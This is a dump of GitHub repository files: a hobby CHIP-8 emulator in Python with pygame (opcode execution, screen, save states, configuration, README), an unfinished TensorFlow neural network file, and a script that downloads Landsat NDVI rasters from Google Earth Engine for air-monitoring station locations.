self.v[x] = self.v[x] & self.v[y]\n\n elif (lsd == 0x3):\n # 8xy3 - XOR Vx, Vy. Set Vx = Vx XOR Vy.\n self.v[x] = self.v[x] ^ self.v[y] \n\n elif (lsd == 0x4):\n # 8xy4 - ADD Vx, Vy. Set Vx = Vx + Vy, set Vf = carry.\n self.v[x] += self.v[y]\n\n if (self.v[x] > 255):\n self.v[x] -= 256\n self.v[0xF] = 1\n\n elif (lsd == 0x5):\n # 8xy5 - SUB Vx, Vy. Set Vx = Vx - Vy, set Vf = NOT borrow.\n self.v[x] -= self.v[y]\n self.v[0xF] = 1\n\n if (self.v[x] < 0):\n self.v[x] += 256\n self.v[0xF] = 0\n\n elif (lsd == 0x6):\n # 8xy6 - SHR Vx {, Vy}. Set Vx = Vx SHR 1. If lsb of Vx is 1, \n # then Vf = 1, else Vf = 0. Then Vx = Vx \\ 2.\n self.v[0xF] = self.v[x] & 0x1\n self.v[x] = self.v[x] >> 1\n\n elif (lsd == 0x7):\n # 8xy7 - SUBN Vx, Vy. Set Vx = Vy - Vx, set Vf = NOT borrow.\n val = self.v[y] - self.v[x]\n self.v[0xF] = 0x1\n\n if (val < 0x0):\n val = val + 0xFF\n self.v[0xF] = 0x0\n\n self.v[x] = val\n\n elif (lsd == 0xE):\n # 8xyE - SHL Vx {, Vy}. Set Vx = Vx SHL 1. If msb of Vx is 1, \n # then Vf = 1, else 0. Then Vx = Vx * 2.\n self.v[0xF] = self.v[x] & 0x80\n self.v[x] = (self.v[x] << 1) & 0xFF\n\n elif (msd == 0x9):\n # 9xy0 - SNE Vx, Vy. Skip next instruction if Vx != Vy \n # (increase PC by 2).\n if (self.v[x] != self.v[y]):\n self.pc += 2\n\n elif (msd == 0xA):\n # Annn - Ld I, addr. Set IR = nnn.\n self.ir = nnn\n\n elif (msd == 0xB):\n # Bnnn - Jp V0, addr. Set PC = V0 + nnn.\n self.pc = self.v[0x0] + nnn\n\n elif (msd == 0xC):\n # Cxkk - RND Vx, byte. Set Vx = random byte [0, 255] AND kk.\n self.v[x] = randint(0, 255) & kk\n\n elif (msd == 0xD):\n # Dxyn - DRW Vx, Vy, nibble. 
Display n-byte sprite starting at mem \n            # location IR at (Vx, Vy), set Vf = collision.\n\n            self.v[0xF] = 0\n            pixelCollision = False\n\n            for i in range(lsd):\n                pixelCollision = self.screen.byteToPixel(\n                    self.v[x], self.v[y] + i, self.memory[self.ir + i])\n\n                if (pixelCollision):\n                    self.v[0xF] = 1\n\n            self.screen.update()\n\n        elif (msd == 0xE):\n            if (lsd == 0xE):\n                # Ex9E - SKP Vx. If key pressed on keyboard corresponds with \n                # value in Vx, increment PC by 2.\n                if (self.keyPressed == self.v[x]):\n                    self.pc += 2\n\n            elif (lsd == 0x1):\n                # ExA1 - SKNP Vx. If key pressed on keyboard does not correspond \n                # to value in Vx, increment PC by 2.\n                if (self.keyPressed != self.v[x]):\n                    self.pc += 2\n\n        elif (msd == 0xF):\n            if (y == 0x0):\n                if (lsd == 0x7):\n                    # Fx07 LD Vx, DT. Set Vx = delay timer value.\n                    self.v[x] = self.delayTimer\n\n                if (lsd == 0xA):\n                    # Fx0A - LD Vx, key. Store value of key press in Vx. All \n                    # execution is stopped until key is pressed.\n                    while (self.keyPressed == -1 and self.running):\n                        self._eventHandler()\n\n                    self.v[x] = self.keyPressed\n\n            elif (y == 0x1):\n                if (lsd == 0x5):\n                    # Fx15 - LD DT, Vx. Set delay timer = Vx.\n                    self.delayTimer = self.v[x]\n\n                if (lsd == 0x8):\n                    # Fx18 - LD ST, Vx. Set sound timer = Vx.\n                    self.soundTimer = self.v[x]\n\n                if (lsd == 0xE):\n                    # Fx1E - Add I, Vx. Set IR = IR + Vx.\n                    self.ir = self.ir + self.v[x]\n\n            elif (y == 0x2):\n                # Fx29 - LD F, Vx. Set IR = location of sprite for digit Vx.\n                self.ir = self.v[x] * 5\n\n            elif (y == 0x3):\n                # Fx33 - LD B, Vx. Store BCD representation of Vx in mem location \n                # IR, IR+1, and IR+2.\n                num = self.v[x]\n                hundredsDigit = num // 100\n                num = num % 100\n                tensDigit = num // 10\n                num = num % 10\n                onesDigit = num\n\n                self.memory[self.ir] = hundredsDigit\n                self.memory[self.ir + 1] = tensDigit\n                self.memory[self.ir + 2] = onesDigit\n\n            elif (y == 0x5):\n                # Fx55 - LD [I], Vx. Store registers V0 to Vx in mem location \n                # starting at IR.\n                for i in range(x + 1):\n                    self.memory[self.ir + i] = self.v[i]\n\n            elif (y == 0x6):\n                # Fx65 - LD Vx, [I]. Read registers V0 to Vx from mem location \n                # starting at IR.\n                for i in range(x + 1):\n                    self.v[i] = self.memory[self.ir + i]\n        else:\n            print(\"Invalid opcode\", hex(self.op), \". Exiting...\")\n            self.running = False\n    \n    def _decrementTimers(self):\n        # Decrement the timer values at a rate of 60 Hz. \n        self.delayTimer = max(self.delayTimer - 1, 0)\n        self.soundTimer = max(self.soundTimer - 1, 0)\n\n    def runOneCycle(self):\n        \"\"\"Main execution loop. Calls all the required functions to run the\n        CHIP8 emulator.\n        \"\"\"\n        self._eventHandler()\n        self._fetchOpcode()\n        self._executeOpcode()\n        self.screen.update()" }, { "alpha_fraction": 0.373776912689209, "alphanum_fraction": 0.4011741578578949, "avg_line_length": 23.926828384399414, "blob_id": "34372966b7450983149f86a73e6cc65831c531b3", "content_id": "92b4e0365ed2a6abebbed361ee37568d0650d134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1022, "license_type": "no_license", "max_line_length": 94, "num_lines": 41, "path": "/README.md", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "# CHIP-8 CPU Emulator\nA CHIP-8 CPU emulator with additional features.\n\n# Overview of features\n* GUI for ROM selection\n* Adjustable clock speed\n* Adjustable screen scale\n* Single save state (F11 to save, F12 to load)\n\n# Packages Used\n* pygame\n* easygui\n\n# Running\n1. Install the packages listed above.\n2. 
Run ```main.py```\n\nThe CHIP-8 uses a hexadecimal keyboard for input. The mapping is shown in the following table.\n\n| Chip 8 Key | Keyboard Key |\n| :--------: | :----------: |\n|    `1`     |     `1`      |\n|    `2`     |     `2`      |\n|    `3`     |     `3`      |\n|    `4`     |     `q`      |\n|    `5`     |     `w`      |\n|    `6`     |     `e`      |\n|    `7`     |     `a`      |\n|    `8`     |     `s`      |\n|    `9`     |     `d`      |\n|    `0`     |     `x`      |\n|    `A`     |     `z`      |\n|    `B`     |     `c`      |\n|    `C`     |     `4`      |\n|    `D`     |     `r`      |\n|    `E`     |     `f`      |\n|    `F`     |     `v`      |\n\n# Credits\n\n* http://devernay.free.fr/hacks/chip8/C8TECH10.HTM\n" }, { "alpha_fraction": 0.5332496762275696, "alphanum_fraction": 0.5450438857078552, "avg_line_length": 31.145160675048828, "blob_id": "4d5c051609a5109ea7a3217e1a168cf379f88644", "content_id": "e8464ad0068408a747005ddbbf2ba8d4cf522f6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3985, "license_type": "no_license", "max_line_length": 84, "num_lines": 124, "path": "/screen.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\"Screen class to handle initialization, drawing, and updating. Top left of\nscreen is (x=0, y=0)\n\"\"\"\n\nfrom pygame import Color, display, draw\n\nPIXEL_OFF = Color(0, 0, 0, 255)\nPIXEL_ON = Color(255, 255, 255, 255)\nPIXEL_WIDTH = 64\nPIXEL_HEIGHT = 32\n\nclass Chip8Screen:\n    def __init__(self, scale=10):\n        \"\"\"Initialize the screen object variables. The CHIP8 uses a 64x32 pixel \n        screen. A custom screen scale can be passed to this function to suit any \n        size screen.\n        \"\"\"\n        self.width = PIXEL_WIDTH * scale\n        self.height = PIXEL_HEIGHT * scale\n        self.scale = scale\n        self.pixelMap = []\n\n    def initDisplay(self):\n        \"\"\"Initializes the screen in pygame with the screen object variables.\n        \"\"\"\n        display.init()\n        self.surface = display.set_mode([self.width, self.height])\n        self.clearScreen()\n        self.update()\n\n    def clearScreen(self):\n        \"\"\"Set all pixels on screen to off.\"\"\"\n        self.surface.fill(PIXEL_OFF)\n\n    def setPixel(self, x, y):\n        \"\"\"Set a pixel in the buffer to be on at a specific x, y location. Need\n        to call update() to load the buffer onto the screen.\n        \"\"\"\n        x_pos = x * self.scale\n        y_pos = y * self.scale\n\n        draw.rect(self.surface, PIXEL_ON, \n            (x_pos, y_pos, self.scale, self.scale))\n\n    def resetPixel(self, x, y):\n        \"\"\"Set a pixel in the buffer to be off at a specific x, y location. Need\n        to call update() to load the buffer onto the screen.\n        \"\"\"\n        x_pos = x * self.scale\n        y_pos = y * self.scale\n\n        draw.rect(self.surface, PIXEL_OFF, \n            (x_pos, y_pos, self.scale, self.scale))\n\n    def getPixel(self, x, y):\n        \"\"\"Return true if pixel at position (x, y) is on.\"\"\"\n        x_pos = x * self.scale\n        y_pos = y * self.scale\n\n        pixelState = self.surface.get_at((x_pos, y_pos))\n\n        if (pixelState == PIXEL_OFF):\n            return False\n        else:\n            return True\n    \n    def getPixelMap(self):\n        \"\"\"Store the current screen of pixels in a 2D array. Used for save \n        states.\n        \"\"\"\n        self.pixelMap.clear()\n        tempMap = []\n\n        for y in range(PIXEL_HEIGHT):\n            for x in range(PIXEL_WIDTH):\n                if (self.getPixel(x, y)):\n                    tempMap.append(1)\n                else:\n                    tempMap.append(0)\n            self.pixelMap.append(tempMap.copy())\n            tempMap.clear()\n\n    def byteToPixel(self, x, y, byte):\n        \"\"\"Draws a byte onto the screen. Since a byte is 8-bits in length, this\n        function will draw an 8 pixel wide line starting at location x, y. The\n        CHIP8 uses an XOR to draw, so a pixel that is already on will be turned\n        off when it is drawn on again. 
Returns whether a pixel collision \n happened.\n \"\"\"\n setVF = False\n\n for i in range(7, -1, -1):\n mask = 1\n if (byte & (mask << i) != 0):\n # Pixel at (x, y) commanded on\n if (not self.getPixel((x + 7 - i) % PIXEL_WIDTH, y % PIXEL_HEIGHT)):\n # Pixel is off, so turn on this pixel\n self.setPixel((x + 7 - i) % PIXEL_WIDTH, y % PIXEL_HEIGHT)\n else:\n # Pixel is already on, so turn this pixel off and set v[0xF]\n self.resetPixel((x + 7 - i) % PIXEL_WIDTH, y % PIXEL_HEIGHT)\n setVF = True\n \n return setVF\n\n def getWidth(self):\n \"\"\"Get the width of the screen.\"\"\"\n return self.width\n\n def getHeight(self):\n \"\"\"Get the height of the screen.\"\"\"\n return self.height\n\n def getScale(self):\n \"\"\"Get the scale of the screen.\"\"\"\n return self.scale\n\n def update(self):\n \"\"\"Update the screen with the buffer.\"\"\"\n display.flip()\n\n def destroy(self):\n \"\"\"Destroy the current screen.\"\"\"\n display.quit()" }, { "alpha_fraction": 0.5788302421569824, "alphanum_fraction": 0.5845518112182617, "avg_line_length": 34.7613639831543, "blob_id": "e6036bda7043a28998d7e6c82151fe74508fb355", "content_id": "d074148ab0ee5d71d91bcccc40f7a6510ae2bf7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3146, "license_type": "no_license", "max_line_length": 80, "num_lines": 88, "path": "/save.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\"Class for handling save state.\"\"\"\n\nPIXEL_WIDTH = 64\nPIXEL_HEIGHT = 32\n\nclass Chip8SaveState():\n def __init__(self):\n \"\"\"Initialize a save state instance. The class variables are nearly the \n same as the main emulator class, however this class also keeps track\n of the screen.\n \"\"\"\n self.saveStateValid = False\n self.pc = 0 # Program counter\n self.ir = 0 # Index Register\n self.v = [] # CPU Registers\n self.op = 0x0 # Current Opcode\n self.sp = 0 # Stack pointer\n self.programMemoryStartAddress = 0\n self.keyPressed = -1\n self.memory = []\n self.stack = []\n self.delayTimer = 0\n self.soundTimer = 0\n self.running = True\n self.beepFreq = 0\n self.beepDuration = 0\n self.speed = 0\n self.screen = []\n \n def saveSaveState(self, cpu):\n \"\"\"Save a copy of the current emulator object and save the current\n screen drawing.\n \"\"\"\n self.saveStateValid = True\n self.pc = cpu.pc # Program counter\n self.ir = cpu.ir # Index Register\n self.v = cpu.v.copy() # CPU Registers\n self.op = cpu.op # Current Opcode\n self.sp = cpu.sp # Stack pointer\n self.programMemoryStartAddress = cpu.programMemoryStartAddress\n self.keyPressed = cpu.keyPressed\n self.memory = cpu.memory.copy()\n self.stack = cpu.stack.copy()\n self.delayTimer = cpu.delayTimer\n self.soundTimer = cpu.soundTimer\n self.running = cpu.running\n self.beepFreq = cpu.beepFreq\n self.beepDuration = cpu.beepDuration\n self.speed = cpu.speed\n\n cpu.screen.getPixelMap()\n self.screen = cpu.screen.pixelMap\n\n def loadSaveState(self, cpu):\n \"\"\"Load the saved copy of the emulator object back into the emulator. 
\n If there is currently no state saved, then calling this function does\n nothing.\n \"\"\"\n if (self.saveStateValid):\n cpu.pc = self.pc # Program counter\n cpu.ir = self.ir # Index Register\n cpu.v = self.v.copy() # CPU Registers\n cpu.op = self.op # Current Opcode\n cpu.sp = self.sp # Stack pointer\n cpu.programMemoryStartAddress = self.programMemoryStartAddress\n cpu.keyPressed = self.keyPressed\n cpu.memory = self.memory.copy()\n cpu.stack = self.stack.copy()\n cpu.delayTimer = self.delayTimer\n cpu.soundTimer = self.soundTimer\n cpu.running = self.running\n cpu.beepFreq = self.beepFreq\n cpu.beepDuration = self.beepDuration\n cpu.speed = self.speed\n self._drawSaveScreen(cpu)\n\n def isSaveStateValid(self):\n \"\"\"Returns if there is a stored save state.\"\"\"\n return self.saveStateValid\n\n def _drawSaveScreen(self, cpu):\n # Draw the saved screen.\n cpu.screen.clearScreen()\n\n for y in range(PIXEL_HEIGHT):\n for x in range(PIXEL_WIDTH):\n if (cpu.screen.pixelMap[y][x] == 1):\n cpu.screen.setPixel(x, y)" }, { "alpha_fraction": 0.5727332234382629, "alphanum_fraction": 0.5857794880867004, "avg_line_length": 31.617021560668945, "blob_id": "01218dcd7e6756ea5d685bcb5e03f6d32b664665", "content_id": "9c45d0ae9793be1582a05e81508a28487afba966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1533, "license_type": "no_license", "max_line_length": 77, "num_lines": 47, "path": "/config.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\" Configuration code for getting file path for ROM and getting emulator \nvariables for clockspeed and screen scale.\n\"\"\"\n\nimport easygui\n\ndef getEmulatorVariables():\n \"\"\"Open up file selection window to select ROM and emulator variables.\"\"\"\n filePath = easygui.fileopenbox()\n\n # Get emulator variables from user\n msg = \"Enter CHIP-8 emulation variables\"\n title = \"CHIP-8 Setup\"\n fieldNames = [\n \"Clock Speed (Hz) (min 30, max 600)\", \n \"Screen Scale Multiplier (min 1, max 20)\",\n ]\n fieldValues = easygui.multenterbox(msg, title, fieldNames)\n\n while (True):\n if (fieldValues is None):\n break\n \n errmsg = \"\"\n for i in range(len(fieldNames)):\n if (fieldValues[i].strip() == \"\"):\n errmsg = (errmsg \n + ('\"%s\" is a required field.\\n\\n' % fieldNames[i]))\n elif (not fieldValues[i].isdigit()):\n errmsg = (errmsg \n + ('\"%s\" contains non-number values.\\n\\n' \n % fieldNames[i]))\n\n if (errmsg == \"\"):\n break # No problems found\n\n fieldValues = easygui.multenterbox(\n errmsg, title, fieldNames, fieldValues)\n \n userClockSpeed = int(fieldValues[0])\n userScreenScale = int(fieldValues[1])\n\n # Bounds check for emulator variables\n userClockSpeed = max(30, min(userClockSpeed, 600))\n userScreenScale = max(1, min(userScreenScale, 20))\n \n return filePath, userClockSpeed, userScreenScale\n" }, { "alpha_fraction": 0.683363139629364, "alphanum_fraction": 0.692307710647583, "avg_line_length": 23.34782600402832, "blob_id": "651278b17a73b6aa69ff37d3c8b86678dd8a0668", "content_id": "2273f96d73c85d425175bc46956f9a03d82855cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 559, "license_type": "no_license", "max_line_length": 77, "num_lines": 23, "path": "/main.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\"Main program.\"\"\"\n\nimport pygame\nimport config\nfrom screen import Chip8Screen\nfrom chip8 import Chip8Emulator\n\nif (__name__ == 
\"__main__\"):\n \n filePath, userClockSpeed, userScreenScale = config.getEmulatorVariables()\n\n # Initalize emulator\n screen = Chip8Screen(userScreenScale)\n screen.initDisplay()\n cpu = Chip8Emulator(screen, userClockSpeed)\n\n cpu.loadROM(filePath, cpu.programMemoryStartAddress)\n\n while (cpu.running):\n clock = pygame.time.Clock()\n cpu.runOneCycle()\n clock.tick(cpu.speed)\n pygame.quit()" } ]
7
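The emulator above dispatches on fields carved out of each 16-bit opcode with masks and shifts. A standalone sketch of that decode step, using the same field names as `_executeOpcode` (the example opcode is arbitrary):

```python
def decode(op):
    # Split a 16-bit CHIP-8 opcode into the fields _executeOpcode works with.
    return {
        'msd': op >> 12,          # top nibble selects the opcode family
        'x': (op & 0x0F00) >> 8,  # Vx register index
        'y': (op & 0x00F0) >> 4,  # Vy register index
        'lsd': op & 0x000F,       # bottom nibble
        'kk': op & 0x00FF,        # 8-bit immediate value
        'nnn': op & 0x0FFF,       # 12-bit address
    }

# Dxyn (draw): 0xD125 draws a 5-byte sprite at (V1, V2)
assert decode(0xD125) == {'msd': 0xD, 'x': 0x1, 'y': 0x2,
                          'lsd': 0x5, 'kk': 0x25, 'nnn': 0x125}
```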
timonpalm/mnist
https://github.com/timonpalm/mnist
6ccdeab5b574057eae9051081a7a04365cda7b97
b907fdb9df54ff9119ade7b29747a58e249b2db7
71b1d67483b300cf21af1123793731e660f28bf4
refs/heads/master
2020-03-22T10:12:33.594713
2018-07-06T18:36:28
2018-07-06T18:36:28
139,887,842
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5924826860427856, "alphanum_fraction": 0.6419386863708496, "avg_line_length": 25.63157844543457, "blob_id": "3ff2e63db941e75eada8240c37e855c09a1f67b6", "content_id": "710a184e15bb5b362babcfbae1ec7cca9825c554", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 75, "num_lines": 38, "path": "/neuralNet.py", "repo_name": "timonpalm/mnist", "src_encoding": "UTF-8", "text": "# Imports\nimport numpy as np\nimport tensorflow as tf\n\npic_size = 128*128\n\noutput_nodes = 10\nnodes_hl_1 = 300\nnodes_hl_2 = 300\nnodes_hl_3 = 300\n\ndef model(data):\n\thl_1 = {\"weight\": tf.Variable(tf.random_normal([pic_size, nodes_hl_1])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(nodes_hl_1))}\n\n\thl_2 = {\"weight\": tf.Variable(tf.random_normal([nodes_hl_1, nodes_hl_2])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(nodes_hl_2))}\n\n\thl_3 = {\"weight\": tf.Variable(tf.random_normal([nodes_hl_2, nodes_hl_3])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(nodes_hl_3))}\n\n\tol = {\"weight\": tf.Variable(tf.random_normal([nodes_hl_3, output_nodes])),\n\t\t\t\"bias\": tf.Variable(tf.random_normal(output_nodes))}\n\n\tl1 = tf.add(tf.matmul(data, hl_1[\"weight\"]), hl_1[\"bias\"])\n\tl1 = tf.nn.relu(l1)\n\n\tl1 = tf.add(tf.matmul(l1, hl_2[\"weight\"]), hl_2[\"bias\"])\n\tl1 = tf.nn.relu(l1)\n\n\tl1 = tf.add(tf.matmul(l1, hl_3[\"weight\"]), hl_3[\"bias\"])\n\tl1 = tf.nn.relu(l1)\n\n\toutput = tf.add(tf.matmul(l1, ol[\"weight\"]), ol[\"bias\"])\n\n\treturn output\n\ndef train" } ]
1
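A sketch of how the `model()` above could be driven in TF1 style. The original file stops at `def train`, so the input pipeline, loss, optimizer, batch size, and epoch count below are all assumptions rather than code from the repository:

```python
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data  # TF1 tutorial helper

from neuralNet import model, pic_size, output_nodes

mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
x = tf.placeholder(tf.float32, [None, pic_size])      # flattened 28x28 image
y = tf.placeholder(tf.float32, [None, output_nodes])  # one-hot digit label

prediction = model(x)
cost = tf.reduce_mean(
    tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))
optimizer = tf.train.AdamOptimizer().minimize(cost)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for epoch in range(5):
        for _ in range(mnist.train.num_examples // 100):
            batch_x, batch_y = mnist.train.next_batch(100)
            sess.run(optimizer, feed_dict={x: batch_x, y: batch_y})
```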
larkinandy/Canada_NO2_LUR_14_16
https://github.com/larkinandy/Canada_NO2_LUR_14_16
05802eeb84e8a611c6fd9d0e19321bac531ad131
6ea0987817826fd8e091ac81d5ebf9e1c947b93b
a5acd65fd66aef7ea518339090e5c3d576ce6f0d
refs/heads/master
2020-03-28T23:55:45.775579
2018-11-16T00:30:27
2018-11-16T00:30:27
149,316,085
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6683694124221802, "alphanum_fraction": 0.6760989427566528, "avg_line_length": 41.39031219482422, "blob_id": "c753bf3a73e6e0563d14e9888ffcc15593a86c4d", "content_id": "d43f57fd16b18492ba44d5345dd9cfc48176e3d9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14878, "license_type": "permissive", "max_line_length": 136, "num_lines": 351, "path": "/Processing Scripts/downloadEnvRasters_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "############## downloadGreenspace.py ###################\n# Author: Andrew Larkin\n# Developed for Perry Hystad, Oregon State University\n# Date last modified: June 5, 2018\n\n# Description: this script downloads annual MODIS NDVI averages from Google Earth Engine.\n# Annual averages range from 2003-2017. NDVI values are based on TOA-scaled reflectance. \n# Multiple Landsat sensors are used to cover the time range as follows:\n\n# Requirements:\n# Active Google Earth Engine account associated with the installed version of Python. \n# ArcGIS with a liscence for the Spatial Analysis Library\n# Tested and developed on:\n# Windows 10\n# Python 2.7\n# ArcGIS 10.3.2\n\n################### setup ####################\n\n# import modules \nimport ee\nimport time\nimport datetime\nimport math\nimport os\nimport sys\nimport arcpy\nimport urllib2\nimport zipfile\nimport pandas as pd\n\n# folder paths and variables\n# the script, input csv need to be in the main folder. Raster images should be downloaded to subfolders within the main folder\nparentFolder = os.path.dirname(sys.argv[0]) + \"/\" \n\n\ninputCSVFile = parentFolder + \"Stations2017_v3_csv_version.csv\" # file with PURE location data\nCSV_DICT = ['NAPS_ID','Lat_Decimal','Long_Decimal','StartYear'] # PURE attributes needed for the analysis\nSTART_YEAR = 2016\nEND_YEAR = 2016\n\ncollectionName = 'LANDSAT/LC8_L1T_32DAY_NDVI' \n\n# environmental variables and checkout necessary extensions and libraries\narcpy.CheckOutExtension(\"Spatial\")\narcpy.env.overwriteOutput = True\nee.Initialize()\n\n# use a water mask to remove NDVI values over water bodies\nwaterMaskCollection = ee.ImageCollection(\"GLCF/GLS_WATER\")\nwaterMask = waterMaskCollection.reduce(ee.Reducer.median())\nwaterMaskScreen = ee.Image(waterMask).neq(2) \n\n# reduce image catalog to a specific year and geographic region of interest\n# INPUTS:\n# byear (str) - year of interest\n# filterBoundaries (ee.Geometry) - Google Earth Engine geometry object defining region of interest\n# collection (ee.ImageCollection) - Goolge Earth Engine image collection object containing rasters of interest\n# OUTPUTS:\n# datedCollect (ee.ImageCollection ) - Google Earth Engine image collection containing filtered raster dataset\ndef filterCatalogSet(byear,filterBoundaries,collection):\n startDate = str(int(byear)) + \"-01-01\"\n endDate = str(byear) + \"-12-31\" \n datedCollect = collection.filterDate(startDate,endDate)\n datedCollect = datedCollect.filterBounds(filterBoundaries)\n return(datedCollect)\n\n# test if all raster images for all years for a specific location have been downloaded \n# INPUTS:\n# inputParams (dict)\n# startYear (int) - start year of data to download rasters for\n# endYear (int) - end year of data to download rasters for\n# randID (int) - random id for the community to identify exposures for\n# folderToTest (str) - full filepath to the folder to test\n# OUTPUTS:\n# boolean - True if folder contains all raster images, 
false otherwise\ndef testComplete(inputParams,folderToTest):\n    startYear = inputParams['startYear']\n    endYear = inputParams['endYear']\n    randID = inputParams['randID']\n    for year in range(startYear,endYear+1):\n        yearFolder = folderToTest + str(year)\n        zipFile = yearFolder + \"/\"+ str(randID) + \".zip\" \n        if not(os.path.exists(zipFile)):\n            return False\n    return True\n\n# download all raster images for a single location \n# INPUTS:\n#    inputParams (dict)\n#       startYear (int) - start year of data to download rasters for\n#       endYear (int) - end year of data to download rasters for\n#       randID (int) - random id for the community to identify exposures for\n#    reducer (ee.Reducer) - custom Google Earth Engine object\n#    outputFolder (str) - full filepath to where rasters should be saved \ndef downloadSinglePoint(inputParams, reducer,outputFolder):\n    isComplete = testComplete(inputParams,outputFolder)\n    if(isComplete):\n        return True\n    randID = inputParams['randID']\n    latit = inputParams['lat']\n    longit = inputParams['longit']\n    startYear = inputParams['startYear']\n    endYear = inputParams['endYear']\n\n    padding = 0.51 # amount of padding around boundary to add to the raster\n    filterBoundaries = ee.Geometry.Rectangle(longit + padding,\n                                             latit + padding,\n                                             longit - padding,\n                                             latit - padding) \n    for year in range(startYear,endYear+1):\n        yearFolder = outputFolder + str(year)\n        zipFile = yearFolder + \"/\"+ str(randID) + \".zip\" \n        download=False\n        timeToSleep=2\n        while download==False: \n            if not(os.path.exists(zipFile)):\n                try:\n                    download = downloadSingleRaster(year,yearFolder,filterBoundaries,reducer,zipFile,timeToSleep)\n                except Exception as e:\n                    print(str(e))\n                finally:\n                    time.sleep(timeToSleep)\n            else:\n                print(zipFile + \" already exists, did you already download this raster?\") \n                download=True\n\n# download one raster\n# INPUTS:\n#    year (str) - year of raster coverage\n#    yearFolder (str) - full filepath where image will be downloaded\n#    filterBoundaries (ee.Geometry.Rectangle) - spatial extent of raster to download\n#    reducer (ee.Reducer) - custom Google Earth Engine object - defines which type of summary statistic to use (e.g. mean)\n#    zipFile (str) - full filepath where the zipped raster should be written to \n# OUTPUTS:\n#    True if raster download was successful, false otherwise\ndef downloadSingleRaster(year,yearFolder,filterBoundaries,reducer,zipFile,timeToSleep): \n    params = {'scale':'30'} # spatial resolution, in units of meters. 
Finest possible resolution for MODIS is 250m, for Landsat8 is 30m\n    collection = ee.ImageCollection(collectionName)\n    imageCatalog = filterCatalogSet(year,filterBoundaries,collection)\n    screenedImg = imageCatalog.map(mapMask)\n    reducedImage = screenedImg.reduce(reducer)\n    clippedImage = reducedImage.clip(filterBoundaries)\n    url = clippedImage.getDownloadURL(params)\n    print(\"the url to download is \" + url) \n    try:\n        if(os.path.exists(yearFolder) == False):\n            os.mkdir(yearFolder) \n        f = open(zipFile ,'wb')\n        f.write(urllib2.urlopen(url,timeout= 10*6).read())\n        f.close() \n        zip_ref = zipfile.ZipFile(zipFile, 'r')\n        zip_ref.extractall(yearFolder)\n        zip_ref.close()\n        return(True) \n    except Exception as e:\n        print(str(e))\n        if(str(e) == \"HTTP Error 400: Bad Request\"):\n            return(True)\n        time.sleep(timeToSleep)\n        timeToSleep = min(60,timeToSleep+10)\n        print(timeToSleep)\n        try:\n            f.close()\n        except Exception as e:\n            print(e)\n        if(os.path.exists(zipFile)):\n            os.remove(zipFile)\n        return(False)\n\n# map a mask function to apply to each image in the NDVI dataset (the cloud\n# screening steps are currently commented out, leaving only the water mask)\n# Inputs:\n#   image (Google Earth Engine image object) - raster image to apply the mask function to\n# Outputs:\n#   image (Google Earth Engine image object) - NDVI values of the input image after applying\n#                                              the water mask\ndef mapMask(image):\n    #ndvi = ee.Image(image).select('NDVI')\n    #fmaskVals = ee.Image(image).select('SummaryQA')\n    validVals = [0,1]\n    #screenedImg = ee.Image(fmaskVals).neq(-1)\n    #screenedImg3 = ee.Image(fmaskVals).neq(2)\n    #screenedImg4 = ee.Image(fmaskVals).neq(3)\n\n    screenedImg = ee.Image(image).updateMask(waterMaskScreen)\n    return screenedImg\n\n\n\n# process downloaded NDVI raster so ArcGIS properly recognizes null values as \"NULL\"\n# Inputs:\n#   inputFolder (string) - folder containing .tif images to process\n#   outputFolder (string) - folder containing input .tif images with NULL values \n#                           recognizable by ArcGIS\ndef createRasters(inputFolder,outputFolder):\n    filesToProcess = os.listdir(inputFolder)\n    fileList = []\n    # for each file in the folder, change exact 0 values to NULL\n    for filename in filesToProcess:\n        if(filename[len(filename)-3:len(filename)] == \"tif\"):\n            fileList.append(filename)\n    for filename in fileList:\n        outSetNull = arcpy.sa.SetNull(inputFolder + filename, inputFolder + filename, \"VALUE = 0\") \n        outputName = outputFolder + filename[2:len(filename)-4] + \"null\"\n        outSetNull.save(outputName.replace('.','')+ \".tif\")\n\n# get data from a single row of a pandas dataframe\n# INPUTS:\n#    rawData (pandas df) - contains raw data to read from\n#    index (int) - row number to read\n#    startYear (int) - first year of data coverage\n#    endYear (int) - last year of data coverage\n# OUTPUTS:\n#    tempDict (dictionary)\n#       randID (int) - id previously assigned randomly to row instance\n#       lat (float) - latitude coordinate\n#       longit (float) - longitude coordinate\n#       startYear (int) - starting year of data coverage\n#       endYear (int) - ending year of data coverage\ndef getRowData(rawData,index,startYear,endYear):\n    tempRow = rawData.iloc[index]\n    print(tempRow.head())\n    tempRandID = int(tempRow[CSV_DICT[0]])\n    tempLat = tempRow[CSV_DICT[1]]\n    tempLong = tempRow[CSV_DICT[2]]\n    tempDict = {'randID':tempRandID,'lat':tempLat,'longit':tempLong,'startYear':startYear,'endYear':endYear}\n    return(tempDict)\n\n# test all zipped files in an input folder for correctness and remove corrupted files\n# INPUTS:\n#    inputFolder (str) - folder containing zip files to test (and 
